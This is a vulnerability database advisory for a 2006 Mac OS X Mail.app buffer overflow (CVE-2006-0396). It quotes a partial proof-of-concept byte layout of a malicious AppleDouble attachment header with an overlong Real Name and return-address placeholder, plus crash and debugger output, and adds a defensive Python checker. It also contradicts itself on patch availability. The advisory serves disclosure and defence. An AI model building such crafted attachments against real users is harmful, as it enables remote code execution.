Vulnerability Details
Apple Mac OS X Mail Message Attachment Remote Buffer Overflow Vulnerability
- CNNVD ID: CNNVD-200603-268
- Severity: Medium
- CVE ID: CVE-2006-0396
- Vulnerability type: Buffer overflow
- Published: 2006-03-14
- Threat type: Remote
- Updated: 2006-03-21
- Vendor: Apple
- Vulnerability source: Kevin Finisterre d...
Vulnerability Summary
Apple Mac OS X is the operating system used by Apple's family of computers.
A buffer overflow vulnerability exists in Apple Mac OS X's Security Update 2006-001; an attacker may exploit it to execute arbitrary instructions on the machine.
After Apple's Security Update 2006-001 is installed, a buffer overflow exists in Mail.app. An attacker can trigger it by sending a specially crafted MIME-encapsulated Macintosh file that contains an AppleDouble header. For example:
"\x00\x05\x16\x07". # AppleDouble Magic Number
"\x00\x02\x00\x00". # Version 2
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". # 16 Bytes of filler
"\x00\x03\x00\x00". # Number of entries (3)
"\x00\x09\x00\x00". # Entry ID 9 is for ''Finder Info''
"\x00\x3e\x00\x00". # Start of Finder Info data is at file offset 0x3e
"\x00\x0a\x00\x00". # Length of Finder Info is 0x0a or 10
"\x00\x03\x00\x00". # Entry ID 3 is for ''Real Name''
"\x00\x48\x00\x00". # Start of Real Name data is at file offset 0x48
"\x00\xf5\x00\x00". # Length of Real Name is 0xf5 or 245
"\x00\x02\x00\x00". # Entry ID 2 is for ''Resource Fork''
"\x01\x3d\x00\x00". # Start of Resource Fork is at file offset 0x013d
"\x05\x3a\x00\x00". # Length of Resource fork is 0x053a
"\x00\x00\x00\x00". # <null> filler
"\x00\x00\x00\x00". # <null> filler
"A" x 226 . "$retaddr" x 3 . "zzz.mov." . # remember this length is hard coded above.
...
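If a message with the above header arrives in the Mail.app inbox, the user sees only the first 11 characters of the name supplied by the Real Name entry, which in this example is "AAAAAAAAAAA...mov". Other examples might include "SuperTastey...mov" or "NakedChicks...mov".
Double-clicking the attachment produces the following dump: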
Date/Time: 2006-03-04 10:35:32.472 -0500
OS Version: 10.4.5 (Build 8H14)
Report Version: 4
Command: Mail
Path: /Applications/Mail.app/Contents/MacOS/Mail
Parent: WindowServer [64]
Version: 2.0.7 (746.2)
Build Version: 1
Project Name: MailViewer
Source Version: 7460200
PID: 271
Thread: 0
Exception: EXC_BAD_ACCESS (0x0001)
Codes: KERN_INVALID_ADDRESS (0x0001) at 0x41414140
Several overflows can be seen in gdb:
(gdb) bt
#0 0x41424344 in ?? ()
Cannot access memory at address 0x41424344
Cannot access memory at address 0x31313131
Cannot access memory at address 0x41424344
Cannot access memory at address 0x41424344
#1 0x41424344 in ?? ()
Cannot access memory at address 0x41424344
Cannot access memory at address 0x41424344
Cannot access memory at address 0x31313131
warning: Previous frame identical to this frame (corrupt stack?)
Cannot access memory at address 0x41424344
Cannot access memory at address 0x41424344
Cannot access memory at address 0x31313139
This gives control of r0, pc, lr, and half of r31.
(gdb) i r $r0 $pc $lr $r31
r0 0x41424344 1094861636
pc 0x41424344 1094861636
lr 0x41424344 1094861636
r31 0x18b3030 25899056
An attacker who successfully exploits this vulnerability can execute arbitrary instructions remotely.
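The header layout described above, read from the defender's side: an added example (not part of the original advisory, and not Apple's code) that parses the AppleDouble entry table using the RFC 1740 layout (2-byte entry count, then a 4-byte ID, offset and length per entry) and reports a Real Name entry whose declared length exceeds a cap or runs past the end of the file. The function names, the 31-byte cap and the inert sample files are assumptions made for this illustration.

```python
import struct

APPLEDOUBLE_MAGIC = 0x00051607   # magic number from the listing above
ENTRY_NAMES = {2: "Resource Fork", 3: "Real Name", 9: "Finder Info"}
MAX_REAL_NAME = 31               # assumed policy cap, not a value from the advisory

def parse_entries(blob):
    """Return [(entry_id, offset, length), ...] from an AppleDouble header."""
    if len(blob) < 26:
        raise ValueError("truncated AppleDouble header")
    magic, _version = struct.unpack_from(">II", blob, 0)
    if magic != APPLEDOUBLE_MAGIC:
        raise ValueError("not an AppleDouble file")
    (count,) = struct.unpack_from(">H", blob, 24)   # follows the 16 filler bytes
    if 26 + 12 * count > len(blob):
        raise ValueError("entry table runs past end of file")
    return [struct.unpack_from(">III", blob, 26 + 12 * i) for i in range(count)]

def audit(blob, max_name=MAX_REAL_NAME):
    """List reasons to quarantine the attachment; an empty list means none found."""
    findings = []
    for entry_id, offset, length in parse_entries(blob):
        label = ENTRY_NAMES.get(entry_id, "entry %d" % entry_id)
        if offset + length > len(blob):
            findings.append("%s extends past end of file" % label)
        if entry_id == 3 and length > max_name:
            findings.append("Real Name is %d bytes (limit %d)" % (length, max_name))
    return findings

def build_sample(name):
    """Constructed, inert sample: Finder Info (10 bytes) then Real Name, no fork."""
    header = struct.pack(">II16xH", APPLEDOUBLE_MAGIC, 0x00020000, 2)
    table = struct.pack(">III", 9, 0x32, 10) + struct.pack(">III", 3, 0x3C, len(name))
    return header + table + b"\x00" * 10 + name

if __name__ == "__main__":
    for name in (b"notes.txt", b"A" * 0xF5):   # 0xf5 is the length used in the listing
        print(len(name), audit(build_sample(name)))
```

A mail gateway would run `audit` on each decoded `multipart/appledouble` header part and quarantine the message when the list is non-empty.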
Vulnerability Advisory
The vendor has released an upgrade patch that fixes this security issue; download it from the vendor's site:
Apple SecUpd2006-002Intel.dmg
http://wsidecar.apple.com/cgi-bin/nph-reg3rdpty1.pl/product=09965&cat=1&platform=osx&method=sa/SecUpd2006-002Intel.dmg
Apple SecUpd2006-002Ti.dmg
http://wsidecar.apple.com/cgi-bin/nph-reg3rdpty1.pl/product=09964&cat=1&platform=osx&method=sa/SecUpd2006-002Ti.dmg
References
Source: US-CERT
Name: VU#980084
Link: http://www.kb.cert.org/vuls/id/980084
Source: BID
Name: 17081
Link: http://www.securityfocus.com/bid/17081
Source: VUPEN
Name: ADV-2006-0949
Link: http://www.frsirt.com/english/advisories/2006/0949
Source: SECTRACK
Name: 1015762
Link: http://securitytracker.com/id?1015762
Source: SECUNIA
Name: 19129
Link: http://secunia.com/advisories/19129
Source: BUGTRAQ
Name: 20060314 DMA[2006-0313a] - 'Apple OSX Mail.app RFC1740 Real Name Buffer Overflow'
Link: http://www.securityfocus.com/archive/1/archive/1/427601/100/0/threaded
Source: MISC
Link: http://www.digitalmunition.com/DMA%5B2006-0313a%5D.txt
Source: Apple
Name: Apple-SA-2006-03-13
Link: http://lists.apple.com/archives/security-announce/2006/Mar/msg00001.html
Source: docs.info.apple.com
Link: http://docs.info.apple.com/article.html?artnum=303453
Source: XF
Name: macosx-mail-attachment-bo(25209)
Link: http://xforce.iss.net/xforce/xfdb/25209
Source: OSVDB
Name: 23872
Link: http://www.osvdb.org/23872
Affected Entities
- Apple Mac_os_x_server:10.4.1
- Apple Mac_os_x:10.4.1
- Apple Mac_os_x:10.4.4
- Apple Mac_os_x_server:10.4.5
- Apple Mac_os_x_server:10.4.4
Patches
None available